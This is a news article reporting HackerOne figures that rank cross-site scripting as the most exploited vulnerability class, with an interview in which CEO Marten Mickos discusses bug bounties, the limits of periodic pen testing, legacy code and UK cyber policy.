Cross-site scripting (XSS) is the most commonly exploited vulnerability, according to HackerOne, currently the largest platform aimed at connecting organisations with a community of white hat hackers who can identify cyber risks, which currently has around 200,000 members.
XSS is a type of injection security attack in which an attacker injects data, such as a malicious script, into content from otherwise trusted websites. Cross-site scripting attacks happen when an untrusted source is allowed to inject its own code into a web application, and that malicious code is included with dynamic content delivered to a victim’s browser.
This is an example of a vulnerability that exists because functionality routinely built into organisations’ websites can typically do more than it is intended to because there is insufficient validation of the input, which enables black hats to get websites to respond in ways that were not intended by their creators.
According to the latest data from HackerOne, despite being listed in the Owasp top 10 security problems for a number of years, the availability of guidance on how to avoid it and protections against it where front-end web application frameworks are used, XSS (CWE 79) is the most exploited vulnerability in all industries except for financial services and banking, where improper authentication (CWE-287) takes top spot, while being second only to XSS across all other industries, accounting for 12% of all vulnerabilities.
Like all vulnerabilities, HackerOne said XSS issues range in severity. While a reflected XSS vulnerability on a site that does not authenticate users and/or expose any sensitive information, would likely be of low severity, an XSS issue on a system that exposes significant confidential is likely to be far more severe.
XSS is an example of the kind of vulnerability that many organisations are not addressing, but is extremely popular with cyber attackers because they can be found and exploited in organisations across all industry sectors.
The report, which underlines the benefits of “hacker-driven” security, also identifies top vulnerabilities exploited by black hats as information disclosure by companies or employees, which also accounts for 12% of all vulnerabilities like improper authentication, followed by violation of secure design principles (10%) and cross-site request forgery (CSRF) representing 8% of all vulnerabilities being discovered.
According to HackerOne CEO Marten Mickos, using hackers to find vulnerabilities has several advantages over traditional penetration testing and red teaming exercises in helping organisations to take action before anything bad happens.
“When you have a dedicated [pen testing or red] team doing something, over time their creativity will become dull and they will tend to do things in the same way over and over again, and therefore less likely to find what cyber criminals will find,” he told Computer Weekly.
“One advantage of our model is the diversity of people we can call upon, and the fact that they have no previous information about the system, so they are not ‘blinded’ by knowing too much, so they try things dedicated teams are less likely to try.
“As a result, they statistically produce better results because they come from the outside, just like the criminals, and they look more broadly and creatively because they have no preconceived notion or bias about what to look for. And while a lot of our work focuses on web property, we also hack mobile applications, APIs [application program interfaces], infrastructure software, and even chipsets.”
Another advantage, said Mickos, is that bug bounty programmes are on-going and members of HackerOne get paid only if they find something, which means that they are less likely to get complacent than pen testers who typically get paid carrying out testing at a single point in time, regardless of whether or not they find any vulnerabilities.
“Even though some companies deploy new code almost every day, pen testing is done only on periodic basis, and so tends to lag behind by several months,” he said.
The process is essentially the same as any bug bounty programme run by organisations aimed at encouraging white hat hackers to find cyber security vulnerabilities and work with them to mitigate those vulnerabilities in return for bug bounties.
The only real difference, said Mickos, is that organisations that use the HackerOne platform do not have to deal with hacker engagements on a one-to-one basis or handle bounty payments and tax documentation for hackers in about 150 different countries around the world.
“Our software platform automates some of the work, provides a system of record, and provides a payment mechanism, which saves time, effort and headcount. Our platform also provides a ranking system that ensures that the most appropriate white hats are tasked with specific projects and means that HakerOne is able to provide a profile of any hacker submitting a report to an organisation,” he said.
Unlike many security products, Mickos said organisations pay only when hackers find real security vulnerabilities, with the price set by market forces based on the potential impact on the organisation if an attacker were to exploit the vulnerability reported.
The severity of every security vulnerability reported by HackerOne member is measured with Common Vulnerability Scoring System framework (CVSS) v3.0, and the price set accordingly. Vulnerabilities that could have a severe effect if exploited typically command prices of $50,000 to $250,000, but that is fairly rare, according to Mickos, with the average price around $600.
Although HackerOne ranks the members of its platform according to their experience, skill and track record once they are on the programme, it is free for anyone over the age of 14 and from US-approved countries to join, and comes with the added benefit of support and education services.
“We are surprised at how quickly the number of members is growing without any recruitment going on, but I think we are only at the beginning, and I wouldn’t be surprised if we have a million hackers signed up within a few years because there are so many people around the world who have these skills and are looking for meaningful work to do,” said Mickos.
The ranking system means that HackerOne knows the top 1,000 contributors very well, most of them personally, he said. “Once they sign up hackers have the opportunity to demonstrate what they can do, and as soon as they begin to stand out as high performers, we begin to track their performance, with many contributors having jobs in the mainstream cyber security industry,” he said.
“This is a faster, more productive and lower cost way of finding vulnerabilities, than any other,” Mickos claims, adding that HackerOne customers include a wide range of public and private sector organisations, including the US Department of Defense, US General Service Administration, General Motors, Twitter, GitHub, Nintendo, Panasonic Avionics, Qualcomm, Square, Starbucks and Dropbox.
Commenting on the top findings of HackerOne members, Mickos said many of them are longstanding vulnerabilities that organisations are not addressing because they do not understand that the older software they are using was not designed to work in an internet-connected environment.
“It is often challenging trying to fix legacy code because in many cases the people who created the code and understand how it works are no longer at the company and nobody knows where they are,” he said.
After legacy code, one of the biggest challenges is the fact that vulnerabilities are not due to bugs or flaws that can be fixed, but because the software responds to more commands than the user organisations or even the original developers realise. “In quality assurance and other testing, it is quite difficult to detect that software will do more than it is intended to do, creating opportunities for black hats” said Mickos.
Another big reason hackers are able to find vulnerabilities to exploit, he said, is “common negligence” despite the increasing impact of cyber attacks.
“Many organisations are still like deer in the headlights, either not knowing what they need to do to protect themselves, or dedicating software developers to creating something new to advance the business rather than fixing security holes in existing applications. There are many perverse incentives that result in many organisations simply ignoring the problem.”
However, Mickos is optimistic. “I am certain we will fix this, but I know that it will require a very strong response from society, which will include legal mandates. The legislators will have to set mandates for corporations and government entities to take responsibility for this like they did with automobile and airline safety.
Continuous security systems needed
Asked what areas cyber security entrepreneurs should focus on in terms of innovation, Mickos said in light of the fact businesses and individuals are spending more time engaged in activities online, there is a need for more continuous security systems that work in real time.
“Many traditional security systems tend to work only at fixed periodic intervals, so switching from point-in-time solutions to continuous security solutions or faster systems will bring benefits, because at the end of the day, security is about being a step ahead of cyber adversaries
“Other areas that are rapidly growing in importance, include threat intelligence and pooled defences through improved security information sharing. We lack systems, methods and products to do this at scale today, but history has shown that pooling defences can defeat an asymmetric threat, and I think that is what will ultimately succeed in cyber security,” he said.
Commenting on the attitude towards cyber security in the UK, Mickos said most business leaders appear to be taking their responsibilities in this regard seriously and willing to act upon finding regarding their cyber security vulnerabilties. “They realise that is how you build strength,” he said.
Protecting citizens and small businesses
In particular, Mickos praised the work being done by the UK’s National Cyber Security Centre (NCSC) to build services to protect citizens and small businesses.
“I am very impressed at how proactive the NCSC has been in building services for email, protecting against phishing and spam, compared with many countries in Europe,” he said, referring to the NCSC’s Active Cyber Defence programme.
Another positive development, said Mickos, is the introduction of new regulatory requirements like the EU’s General Data Protection Regulation (GDPR).
“Authorities are setting guidelines for organisations, but their approach is not to put blame on organisations. There is a genuine desire to fix the problem, so we are moving in the right direction toward encouraging all organisations to take resolute action, and when they do, the tide will turn,” he said.